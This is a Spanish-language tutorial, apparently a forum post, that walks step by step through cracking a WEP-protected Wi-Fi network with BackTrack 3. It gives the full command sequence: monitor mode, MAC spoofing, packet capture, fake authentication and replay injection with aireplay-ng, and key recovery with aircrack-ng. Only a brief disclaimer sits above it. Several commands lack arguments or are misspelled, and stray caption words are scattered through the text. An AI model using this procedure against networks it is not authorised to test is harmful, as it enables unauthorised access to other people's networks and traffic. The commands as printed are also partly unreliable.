Esto tutorial solo es para demostrar lo debiles que son las contraseñas WEP, robar la contraseña de una red que no te permitan el acceso es delito!!!

Utilizare la distro de Linux BackTrack 3, que la pueden descargar del siguiente link:
Porque las contraseñas WEP son inseguras??

para mas datos aca esta la wiki http://backtrack.offensive-security.com/index.php/Main_Page

Este post muestra como se puede crackear contraseñas WEP de 64 o 128bits en pocos minutos.
Nos conectaremos a un Access Point que usa encriptación WEP, pero del cual no conocemos la contraseña.

Requerimientos:

* Backtrack 3 en CD o USB
* Computadora con placa de red wireles
* Wireless Access point o WIFI Router que use encriptación WEP (uno tuyo o a el que tengas permitido el acceso)


Abri una consola.

1º) debemos habilitar nuestra placa de red en modo monitor

iwconfig para saber el nombre de nuestro dispositivo

airmon-ng stop detenemos el dispositivo

ifconfig down

2º) cambiamos nuestra mac address

macchanger --mac 00:11:22:33:44:66

3º) reiniciamos el dispositivo en modo monitor

airmon-ng start


Wifi


4º) Buscamos red para desencriptar

airodump-ng

wireless

Aqui debemos copiar BSSID (mac address), CH (channel) y ESSID (nombre red).

5º) Recolectamos datos del Access Point

airodump-ng -c -w network.out –bssid [bssid]

en network.out recogeremos los paquetes.

wep


Abri otra consola

6º) Debemos generar paquetes falsos para recolectar mas datos

aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:66 -e

crack

7º) Si el paso anterior te dijo Association successful tipea

airplay-ng -3 -b [bssid] -h 00:11:22:33:44:66

backtrack

Ahora mira en la otra consola que los paquetes de Data# deben incrementarse a gran velocidad, necesitamos mas de 100000.

Porque las contraseñas WEP son inseguras??

8º) Si el paso anterior no genera paquetes proba con

aireplay-ng -2 -p 0841 -c FF.FF.FF.FF.FF.FF -b [bssid] -h 00:11:22:33:44:66
las FF. estan separadas por ":" (no por el punto) o sea FF: no lo pongo asi xq me pone un guiño (si alguien sabe como deshabilitar guiños me avisa)

Wifi

9º) Una vez que alcancemos la cantidad necesaria de paquetes

aircrack-ng -n 128 -b [bssid] network.out-01.cap

Si reemplazas 128 por 64 cambias el largo de la clave a 64bits.

wireless

Lo que nos interesa es el IV Count, es necesario capturar cerca de 50.000 IV´s para poder romper una clave WEP de 64 bits y de 100.000 para una de 128 bits.


En sacar la contraseña no tardas mas de 10 o 15 minutos, por eso antes de poner una contraseña WEP en tu red wireless pensalo bien...